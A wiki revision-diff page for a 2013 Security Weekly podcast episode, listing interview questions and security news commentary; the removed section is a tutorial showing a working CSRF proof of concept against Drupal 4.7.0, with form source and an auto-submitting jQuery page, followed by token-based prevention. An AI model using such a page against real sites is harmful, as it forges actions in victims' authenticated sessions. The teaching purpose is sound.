Difference between revisions of "Episode314"

From Security Weekly Wiki
Jump to navigationJump to search
Line 46: Line 46:
 
# Does state sponsored hacking really go on, does it change anything, and does it really matter?
 
# Does state sponsored hacking really go on, does it change anything, and does it really matter?
 
# Do targeted attacks happen to everyone? What can we do to prevent them? How much resources should you dedicate to protecting from targeted attacks?
 
# Do targeted attacks happen to everyone? What can we do to prevent them? How much resources should you dedicate to protecting from targeted attacks?
 
= Technical Segment - Cross-Site Request Forgery (CSRF or XSRF) =
 
 
Yeah, CSRF has been discussed on PaulDotCom a few times before ([http://pauldotcom.com/wiki/index.php/Finding_%26_Exploiting_CSRF_Vulnerabilities check out the new and growing technical library)] and [https://www.youtube.com/watch?v=nqFzab1si8g John has done videos on it]. But it's back. We're not showing you anything new or revolutionary, as this was Patrick the Intern's first project, to get acquainted with the attack, how it works and set up a working exploit. For this, we're using a very old (6+ years) version of Drupal, version 4.7.0 to be specific. This vulnerability has long been fixed and if you use Drupal's own forms API, you should not have to worry about CSRF in your Drupal sites.
 
 
If you want history and background on CSRF like the "confused deputy" story and links, check out Paul's tech segment on it from [http://pauldotcom.com/wiki/index.php/Episode82 Episode 82]. However, in a nutshell, what this attack does is lets us use an authenticated user's session to perform some action on a site. In this case, a message board. Our message board is set up with permissions so that only users with valid credentials may post to the board. Anyone in the world can read the board, but you need a username and password to post. With CSRF, if we're able to merely get an authenticated user to open a web page, we are able to post what we want to the forum. Here's how it works:
 
 
Because we have access to the form, we can view the source and get the necessary information, which is the form's action and the form's variables that need to be sent with the request. For my forum, this is what it looks like, with some unimportant parts removed, like visual styling.
 
<pre>
 
&lt;form action="/drupal-4.7.0/?q=node/add/forum/2"  method="post" &gt;
 
 
&lt;input type="hidden" name="edit[form_id]" id="edit-form_id" value="forum_node_form"  /&gt;
 
 
Forums:
 
&lt;select name="edit[taxonomy][1]"&gt;
 
&lt;option value="1"&gt;Hacking&lt;/option&gt;
 
&lt;option value="2"&gt;-CSRF&lt;/option&gt;
 
&lt;option value="3"&gt;-XSS&lt;/option&gt;
 
&lt;option value="4"&gt;-SQLi&lt;/option&gt;
 
&lt;/select&gt;
 
 
Subject:
 
&lt;input type="text" name="edit[title]" id="edit-title"  size="60" /&gt;
 
 
Body:
 
&lt;textarea cols="60" rows="20" name="edit[body]"&gt;&lt;/textarea&gt;
 
 
Publishing options
 
&lt;input type="checkbox" name="edit[status]"  value="1" /&gt; Published
 
&lt;input type="checkbox" name="edit[moderate]" value="1" /&gt; In moderation queue
 
&lt;input type="checkbox" name="edit[promote]" value="1" /&gt; Promoted to front page
 
...
 
 
&lt;input type="submit" name="op" value="Submit"  class="form-submit" /&gt;
 
&lt;/form&gt;
 
</pre>
 
 
We see that we need to create a web page that will send a request to /drupal-4.7.0/?q=node/add/forum/2 to add a post to the forum with a taxonomy value of 2. Additionally, we need to send the Subject and Body of the post we want to have published. One part that can get easily overlooked, and we sometimes see this on various sites, the attacker leaves the message in moderation mode by not sending the correct publishing option. We'll want to include the "Published" editing status as well, to make sure our post is immediately visible. Lastly, we need to send the "op" of Submit, so the server will think the user submitted this request.
 
 
Now, we need to get an authenticated user to send the request via an HTTP post. One thing we can do is build a form that has all of these values in html &lt;hidden&gt; tags and then ask the user to click the button for some reason. No intelligent user is going to click the button on a form that some anonymous person sends them. So we need to step this up a bit.
 
 
It's not as hard to get someone to simply load a page as it is to get them to click a button on a page. So instead, we're going to add some javascript, using jQuery, and send off a POST request when the page loads. Here's the code for that:
 
 
<pre>
 
&lt;head&gt;
 
&lt;script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"&gt;&lt;/script&gt;
 
 
&lt;script&gt;
 
function hackMe(){
 
$.post("/drupal-4.7.0/?q=node/add/forum/2", {
 
                                          'edit[title]': "Cheap Viagra! Free Porn!",
 
                                          'edit[taxonomy][1]': "2",
 
                                          'edit[body]': "Proof of concept of CSRF! PaulDotCom Rules! Hack Naked!",
 
                                          'edit[form_id]':"forum_node_form",
 
                                          'edit[status]':"1",
 
                                          'op':"Submit"  } );
 
}
 
 
&lt;/script&gt;
 
&lt;/head&gt;
 
&lt;body onLoad="hackMe()"&gt;
 
&lt;body&gt;
 
 
</pre>
 
 
Now, we just need to get an authenticated user to load the page we've created and there we have it, the user has posted to the forum for us.
 
 
=== Prevention ===
 
 
This gets prevented by the use of session tokens. When the user first authenticates, a token is created and placed in that user's session. Every time the user accesses a page with a form, that token is added to the form and the session's token is compared to the value in the form request. Now when we look at the source of the form, we will not see the token for the authenticated user, we can't include it in our request and when the user loads our page, the server will reject the request.
 
 
For more information on the prevention, check out the frameworks and explanations [https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet#Prevention_Frameworks offered by OWASP]
 
 
=== Stateless ===
 
 
Additionally, [http://appsandsecurity.blogspot.com/2012/01/stateless-csrf-protection.html John Wilander has talked about Stateless CSRF], which is interesting and I wanted to mention it, but I'm still working through the mechanics of it all. Basically the way I understand it, it's an alternative to a CAPTCHA. Possibly, we'll go over this in a future segment.
 
  
 
== Paul's Stories ==
 
== Paul's Stories ==

Revision as of 02:42, 4 January 2013


Episode Media

Episode 314

MP3

Announcements & Shameless Plugs

PaulDotCom Security Weekly - Episode 314 for Thursday January 3d, 2013

  • Tom Clancy's new book, Threat Vector, makes mention to a Hack Naked T-shirt
  • Welcome our latest official sponsor, The SANS Institute! You will be hearing a lot more about some of the different programs and curriculums at SANS over the course of next year.

Check out our last year:

Adam Shostack Jeremiah Grossman Dan Geer Allan Paller Dr. Anton Chuvakin Thomas Ptacek Marcus Sachs Kevin Finisterre Nick Farr Gene Kim

Episode 300

  • Please subscribe to the PaulDotCom Insider Newsletter for all things PaulDotCom, discounts on training, and updates on cool stuff we're doing (like looking for people to help, take people under our wings and teach them security, etc...)
  • We are in the process of archiving and cataloging our technical segments, please visit the PaulDotCom Technical Library. We are also working on updating all of the articles, so check the newsletter or if you want to help in exchange for some free guidance and security training please email me.

Interview: Eric Cole

  1. Does state sponsored hacking really go on, does it change anything, and does it really matter?
  2. Do targeted attacks happen to everyone? What can we do to prevent them? How much resources should you dedicate to protecting from targeted attacks?

Paul's Stories

  1. Ban on demanding Facebook passwords among new 2013 state laws | Reuters - I would be totally creeped out if my employer asked for my Facebook password. Does that even need to be a law?
  2. Security flaw found in app used for 'safe sexting' - Why is that people just love to expose themselves on the Internet? Snapchat, Wickr and other apps such as Facebook's Poke have become popular among teens who believe they are a "safe" way to send explicit pictures of themselves to friends. The reason they believe these apps are safe is because videos and texts sent via them are deleted after a short period of time determined by the sender. Get this though, the app would leak the email address based on a bad password (you need to just know the username), also you could see who the person had been sexting with by visiting a URL based on the username. I guess thats what happens when you let your fourth grader be in charge of web app security.
  3. NYC mayor pins crime rate spike on iPhone - I can't even believe I read this, what a backwards view on security..
  4. Hacker at Public Works went unnoticed for days - Tell me this is not a page right out of one of your pen tests. This is somehow news?
  5. Facebook Patches Webcam Vulnerability After Receiving Hacker Tip - Took them 4 months to fix it, ouch! In the mean time, millions of people were spied on while typing in front of their computer, OMG the horror!
  6. Best Book Bejtlich Read in 2012 - Always love to buy the books on his list, so everyone should go out and buy SSH Mastery by Michael W Lucas and For the President's Eyes Only: Secret Intelligence and the American Presidency from Washington to Bush by Christopher Andrew.
  7. Microsoft Rushes Out ‘Fix It’ For Internet Explorer 0-day Exploit - I guess we will never stop hearing about IE 0-Day.
  8. Security Researcher Compromises Cisco VoIP Phones With Vulnerability - Dark Reading - This is one of the best hacks I've seen in some time. I think some of the stuff we talk about is cool, but not-so-practical. This allows you to tap into people's phones and turn them into listening devices. Now that's interesting!
  9. c0decstuff: Defeating Windows 8 ROP Mitigation - The cat and mouse game between attackers and Microsoft has always been a battle. However, over the years exploits are harder to write, and time will tell if we've hit a plataue. What if Microsoft really can't make it more difficult for attackers to exploit vulnerabilities? What if we can't add to the time it takes to exploti stuff?
  10. Metasploit: 5 Tips to Ensure Safe Penetration Testin - I completely disagree with the analogy that vulnerabilities are just "unintentional APIs". That is a ridiculous claim. Vulnerabilities are weaknesses, and accessing them is usually going against the way the program was intentionally written. It also sometimes causes something to crash, for example a buffer overflow is sorta like a controled crash. The lines between what is a "reliable" exploit and what is not are blury. There are many factors that will change the behavior of an exploit (esp. ones that involve any type of memory manipulation, as memory is volitile if you can remember that from your first computer course). There are really only two categories of reliability, ones that allow commands to run without causing a crash and those that don't. And really what I mean is that command execution in a web app is almost always more reliable than a buffer overflow or memory corruption. However, fingerprinting the target is extremely important, get that wrong and you could just crash the system anyhow.
  11. Celebrity hacker gets ten years - This story caught my eye for a few reasons. One, Scarlett Johansen is smoking hot and I just watched the Avengers (Which I really liked). Okay, so this guy used the tried and true method of hacking the security question to change the password on someone's account. We really need to do a better job of educating people about the security question, its really just another password and should be treated as such. Google two-factor authentication is the way to go and will prevent this type of attacks, implement it on all your systems now. As penetration testers we do the same thing, recon and guess passwords and/or "secret" questions (more like "secret" answers). The hacker did other things like forward all of your email to him. This may sound like fun and easy thing to do in order to kill a weekend, but it landed him 10 years in prison (not so fun unless your into being shanked and raped).

Larry's Stories

DEFCON Documentary Sneak preview - [Larry] - Should be neat. 20 years in the making. Jason Scott and crew have released a 20 minute tease of the documentary.

IE 0-day - [Larry] - A fix is out… and it only affects IE 6, 7 and 8 (not 9 and 10). This of course is still prevalent in may places where newer browsers are unsupported by certain mission critical applications. Sigh. How do developers/vendors get away with this?

Inclusion in Tactical Countermeaseures? - [Larry] - Seeding your real data with fake data, then alerting on it when it moves, or gets published elsewhere. Interesting concept. I'd even argue that access of this data should trigger alarms, because just maybe if it is accessed, it is outside of "normal" filtered means.

Patrick's Stories

  1. 5 Tips to Retain Great Security Talent - Motivate, encourage, give treats.
  2. Patent Trolls Are Back - Do you use a fax, scanner or WiFi? Pay up.
  3. Finding svn Files During Pentesting - SANS article by last week's guest, Tim Medin on being able to find source code on servers because developers leave the .svn directories (Subversion version control) on the production server. This allows people to load the source of files in a browser.
  4. 5 Resolutions InfoSec Pros Should Make - By Rafal Los, many of these are probably good for anyone to make, but it's always good to have things to think about for the new year.
  5. Adrian "Irongeek" Crenshaw with two good updates on his site. He keeps a zoo of web shells that he has found and also wrote a long article on security in the academic world

Jack's Stories from the Porch

  1. TurkTrust, a Turkish CA issued some bogus intermediate CAs, and one was used to sign fraudulent google.com certificates. I think this is a Bad Thing.
  2. Outmaneuvered at Their Own Game, Antivirus Makers Struggle to Adapt according to the New York Times. Of course, the headline "Outmaneuvered at Their Own Game, Newspapers Struggle to Adapt" works, too. I love the irony.
  3. Study: 94 Percent of Healthcare Organizations Breached at least according to a Ponemon study (it might be right anyway). And six percent are unaware?
  4. All current versions of the Ruby on Rails Web framework have a SQL injection vulnerability good thing nothing important uses that framework.